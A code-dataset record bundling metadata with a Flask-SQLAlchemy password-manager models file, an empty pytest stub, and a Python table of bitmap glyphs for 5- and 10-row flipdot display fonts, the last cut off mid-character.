| 53.568182 | 116 | 0.515062 | 502 | 2,357 | 2.398406 | 0.2251 | 0.023256 | 0.01495 | 0.017442 | 0.841362 | 0.819767 | 0.803156 | 0.754983 | 0.754983 | 0.740864 | 0 | 0.581207 | 0.268562 | 2,357 | 43 | 117 | 54.813953 | 0.117169 | 0 | 0 | 0.075 | 0 | 0 | 0.036063 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
509765c6f2a14fc4961f449e1509e51f4f366f33 | 669 | py | Python | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | app/models.py | wproffi2/passwordmanager | 4ef2d7d9ec364b01c69d1bb34902df050313f241 | [
"MIT"
] | null | null | null | from app import db
from flask_login import UserMixin
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(80), unique=True, nullable=False)
password = db.Column(db.String(500), unique=True, nullable=False)
salt = db.Column(db.String(500), unique=True, nullable=False)
class Passwords(db.Model):
id = db.Column(db.Integer, primary_key=True)
Account = db.Column(db.String(80), unique=True, nullable=False)
Password = db.Column(db.String(500), unique=True, nullable=False)
IV = db.Column(db.String(500), unique=True, nullable=False)
Count = db.Column(db.Integer, nullable=True) | 41.8125 | 69 | 0.717489 | 101 | 669 | 4.722772 | 0.287129 | 0.150943 | 0.188679 | 0.201258 | 0.725367 | 0.725367 | 0.725367 | 0.725367 | 0.725367 | 0.549266 | 0 | 0.027778 | 0.139013 | 669 | 16 | 70 | 41.8125 | 0.800347 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.230769 | 0.153846 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
50e9da5f380a24dd2851e9b197ac61c66feef3a3 | 136 | py | Python | design/test_design.py | py-study-design/design | 5a7ce61dc144aea607ea12bfa165be5ac4261f60 | [
"MIT"
] | null | null | null | design/test_design.py | py-study-design/design | 5a7ce61dc144aea607ea12bfa165be5ac4261f60 | [
"MIT"
] | null | null | null | design/test_design.py | py-study-design/design | 5a7ce61dc144aea607ea12bfa165be5ac4261f60 | [
"MIT"
] | 2 | 2019-09-29T15:04:00.000Z | 2020-08-10T10:56:11.000Z | """ Test Cases for Design module
"""
import pytest
import design as d
def test_unroll():
""" Test cases for _unroll """
pass
| 12.363636 | 34 | 0.647059 | 19 | 136 | 4.526316 | 0.631579 | 0.209302 | 0.27907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.242647 | 136 | 10 | 35 | 13.6 | 0.834951 | 0.382353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 7 |
0ff14c273e4870452eaf0ef9984d8f8de626ebb1 | 28,616 | py | Python | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | 3 | 2021-07-30T22:37:30.000Z | 2022-01-26T11:19:01.000Z | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | null | null | null | glyphs.py | simonboots/Hanover_Flipdot | ccbe96fe85df028751ae632328b808e122b4bdae | [
"MIT"
] | 2 | 2016-05-26T22:52:05.000Z | 2022-01-09T12:34:36.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
five = {}
five[' '] = [[0],
[0],
[0],
[0],
[0]]
five['A'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['B'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['C'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 0],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['D'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['E'] = [[1, 1, 1, 1],
[1, 0, 0, 0],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['F'] = [[1, 1, 1, 1],
[1, 0, 0, 0],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 0, 0, 0]]
five['G'] = [[0, 1, 1, 1],
[1, 0, 0, 0],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 1, 1, 0]]
five['H'] = [[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['I'] = [[1, 1, 1],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[1, 1, 1]]
five['J'] = [[1, 1, 1],
[0, 0, 1],
[0, 0, 1],
[0, 0, 1],
[1, 1, 0]]
five['K'] = [[1, 0, 0, 1],
[1, 0, 1, 0],
[1, 1, 0, 0],
[1, 0, 1, 0],
[1, 0, 0, 1]]
five['L'] = [[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['M'] = [[1, 0, 0, 0, 1],
[1, 1, 0, 1, 1],
[1, 0, 1, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1]]
five['N'] = [[1, 0, 0, 1],
[1, 1, 0, 1],
[1, 0, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['O'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['P'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 0],
[1, 0, 0, 0],
[1, 0, 0, 0]]
five['Q'] = [[0, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1]]
five['R'] = [[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 1, 1, 0],
[1, 0, 0, 1],
[1, 0, 0, 1]]
five['S'] = [[0, 1, 1, 0],
[1, 0, 0, 0],
[0, 1, 1, 0],
[0, 0, 0, 1],
[0, 1, 1, 0]]
five['T'] = [[1, 1, 1],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]]
five['U'] = [[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[0, 1, 1, 0]]
five['V'] = [[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[0, 1, 0, 1, 0],
[0, 0, 1, 0, 0]]
five['W'] = [[1, 0, 0, 0, 1],
[1, 0, 0, 0, 1],
[1, 0, 1, 0, 1],
[1, 1, 0, 1, 1],
[1, 0, 0, 0, 1]]
five['X'] = [[1, 0, 1],
[1, 0, 1],
[0, 1, 0],
[1, 0, 1],
[1, 0, 1]]
five['Y'] = [[1, 0, 1],
[1, 0, 1],
[0, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['Z'] = [[1, 1, 1, 1],
[0, 0, 0, 1],
[0, 1, 1, 0],
[1, 0, 0, 0],
[1, 1, 1, 1]]
five['0'] = [[1, 1, 1],
[1, 0, 1],
[1, 0, 1],
[1, 0, 1],
[1, 1, 1]]
five['1'] = [[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0],
[0, 1, 0]]
five['2'] = [[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[1, 0, 0],
[1, 1, 1]]
five['3'] = [[1, 1, 1],
[0, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['4'] = [[0, 0, 1],
[0, 1, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1]]
five['5'] = [[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['6'] = [[1, 1, 1],
[1, 0, 0],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]]
five['7'] = [[1, 1, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 0]]
five['8'] = [[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[1, 0, 1],
[1, 1, 1]]
five['9'] = [[1, 1, 1],
[1, 0, 1],
[1, 1, 1],
[0, 0, 1],
[1, 1, 1]]
five['/'] = [[0, 0, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 0]]
five['\\'] = [[1, 0, 0],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 0, 1]]
five['('] = [[0, 1],
[1, 0],
[1, 0],
[1, 0],
[0, 1]]
five[')'] = [[1, 0],
[0, 1],
[0, 1],
[0, 1],
[1, 0]]
five[']'] = [[1, 1],
[0, 1],
[0, 1],
[0, 1],
[1, 1]]
five['['] = [[1, 1],
[1, 0],
[1, 0],
[1, 0],
[1, 1]]
five['{'] = [[0, 1, 1],
[0, 1, 0],
[1, 0, 0],
[0, 1, 0],
[0, 1, 1]]
five['}'] = [[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0],
[1, 1, 0]]
five['>'] = [[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0]]
five['<'] = [[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]]
five['+'] = [[0, 0, 0],
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0]]
five['&'] = [[0, 0, 0],
[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0]]
five['-'] = [[0, 0, 0],
[0, 0, 0],
[1, 1, 1],
[0, 0, 0],
[0, 0, 0]]
five['@'] = [[0, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1],
[1, 0, 1, 1],
[1, 0, 1, 1]]
five['!'] = [[1],
[1],
[1],
[0],
[1]]
five['?'] = [[1, 1, 1],
[0, 0, 1],
[0, 1, 1],
[0, 0, 0],
[0, 1, 0]]
five['£'] = [[0, 1, 1],
[1, 0, 0],
[1, 1, 0],
[1, 0, 0],
[1, 1, 1]]
five['$'] = [[0, 1, 1],
[1, 0, 0],
[1, 1, 0],
[1, 0, 0],
[1, 1, 1]]
five['%'] = [[1, 0, 1],
[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[1, 0, 1]]
five['.'] = [[0],
[0],
[0],
[0],
[1]]
five[':'] = [[0],
[1],
[0],
[0],
[1]]
five[','] = [[0],
[0],
[0],
[1],
[1]]
five[';'] = [[0],
[1],
[0],
[1],
[1]]
five['='] = [[0, 0, 0],
[1, 1, 1],
[0, 0, 0],
[1, 1, 1],
[0, 0, 0]]
five['\''] =[[1],
[1],
[0],
[0],
[0]]
five['"'] = [[1, 0, 1],
[1, 0, 1],
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]]
five['#'] = [[0, 1, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0],
[1, 1, 1, 1, 1],
[0, 1, 0, 1, 0]]
five['*'] = [[0, 1, 0],
[1, 1, 1],
[0, 1, 0],
[0, 0, 0],
[0, 0, 0]]
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
ten = {}
ten[' '] = [[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0],
[0]]
ten['A'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['B'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0]]
ten['C'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['D'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0]]
ten['E'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['F'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['G'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['H'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['I'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['J'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['K'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['L'] = [[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['M'] = [[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 1, 1, 0, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 0, 1, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1]]
ten['N'] = [[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 1, 1]]
ten['O'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['P'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['Q'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1],
[1, 1, 0, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[0, 1, 1, 0, 1, 1]]
ten['R'] = [[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 0],
[1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1]]
ten['S'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['T'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0],
[0, 0, 1, 1, 0, 0]]
ten['U'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['V'] = [[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 0, 0, 1, 0, 0, 0]]
ten['W'] = [[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 0, 0, 1, 1],
[1, 1, 0, 1, 1, 1, 0, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 0, 1, 1, 1, 1],
[1, 1, 1, 0, 0, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 0, 0, 1, 1]]
ten['X'] = [[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 0],
[0, 0, 1, 1, 1, 0, 0],
[0, 1, 1, 1, 1, 1, 0],
[1, 1, 1, 0, 1, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 1, 1]]
ten['Y'] = [[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 0, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1]]
ten['Z'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['0'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['1'] = [[0, 0, 1, 1],
[0, 1, 1, 1],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1]]
ten['2'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1]]
ten['3'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1]]
ten['4'] = [[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[1, 1, 1, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1]]
ten['5'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 0, 0],
[1, 1, 1, 1, 1, 0],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['6'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 0, 0],
[1, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['7'] = [[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[1, 1, 1, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0],
[1, 1, 0, 0, 0, 0]]
ten['8'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['9'] = [[0, 1, 1, 1, 1, 0],
[1, 1, 1, 1, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1],
[1, 1, 0, 0, 1, 1],
[1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 0]]
ten['/'] = [[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0]]
ten['\\'] = [[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1]]
ten['('] = [[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 1],
[0, 0, 1, 1]]
ten[')'] = [[1, 1, 0, 0],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0]]
ten['['] = [[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[1, 1, 1, 1],
[1, 1, 1, 1]]
ten[']'] = [[1, 1, 1, 1],
[1, 1, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 0, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]]
ten['{'] = [[0, 0, 1, 1],
[0, 1, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 0, 0],
[1, 1, 0, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 1],
[0, 0, 1, 1]]
ten['}'] = [[1, 1, 0, 0],
[1, 1, 1, 0],
[0, 1, 1, 0],
[0, 1, 1, 0],
[0, 0, 1, 1],
[0, 0, 1, 1],
[0, 1, 1, 0],
[0, 1, 1, 0],
[1, 1, 1, 0],
[1, 1, 0, 0]]
ten['>'] = [[0, 0, 0, 0, 1, 0],
[0, 0, 0, 1, 1, 1],
[0, 0, 1, 1, 1, 0],
[0, 1, 1, 1, 0, 0],
[0, 1, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 1, 1, 1, 0, 0],
[0, 0, 1, 1, 1, 0],
